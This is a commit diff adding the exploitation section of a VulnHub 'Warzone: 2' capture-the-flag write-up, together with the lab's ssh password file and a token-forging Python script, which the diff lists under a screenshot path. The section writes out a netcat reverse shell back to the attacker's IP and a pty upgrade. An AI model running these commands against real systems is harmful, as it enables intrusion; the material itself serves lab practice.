Exploitation

Author: whatsyourask

VulnHub/Warzone: 2/README.md

@@ -68,6 +68,45 @@ The main vulnerability is this. But i don't know about backend of 1337 port. May
 
 ## Exploitation
 
+### Token
+
+[Script to create a token](token.py)
+
+Successfully got access with 'lower' credentials.
+
+![access](screenshots/1337_access.png)
+
+But we don't have shell yet.
+
+### Shell
+
+Get shell is easy:
+
+Local:
+```
+nc -lnvp 4444
+```
+Target:
+```
+nc 192.168.88.225 4444 -c /bin/sh
+```
+So, after target connected to us, it will open a shell.
+
+![shell](screenshots/shell.png)
+
+```
+python -c 'import pty;pty.spawn("/bin/bash")'
+```
+User - `www-data`.
+
+### ssh flagman
+
+In flagman home directory:
+
+![warzone](screenshots/warzone.png)
+
+Now we have a good shell and ssh access.
+
 ## Post exploitation
 
 ## Sources

VulnHub/Warzone: 2/creds/flagman_ssh.txt

@@ -0,0 +1 @@
+i_hate_signals!

VulnHub/Warzone: 2/screenshots/1337_access.png

@@ -0,0 +1,11 @@
+import hashlib
+
+username = open('creds/1337_username.txt', 'r').read()[:-1]
+password = open('creds/1337_password.txt', 'r').read()[:-1]
+user_pass_upper = username.encode('utf-8') + password.encode('utf-8')
+upper_token = hashlib.sha256(user_pass_upper).hexdigest()
+print(user_pass_upper, upper_token)
+user_pass_lower = username.lower().encode('utf-8') + password.lower().encode('utf-8')
+lower_token = hashlib.sha256(user_pass_lower).hexdigest()
+print(user_pass_lower, lower_token)
+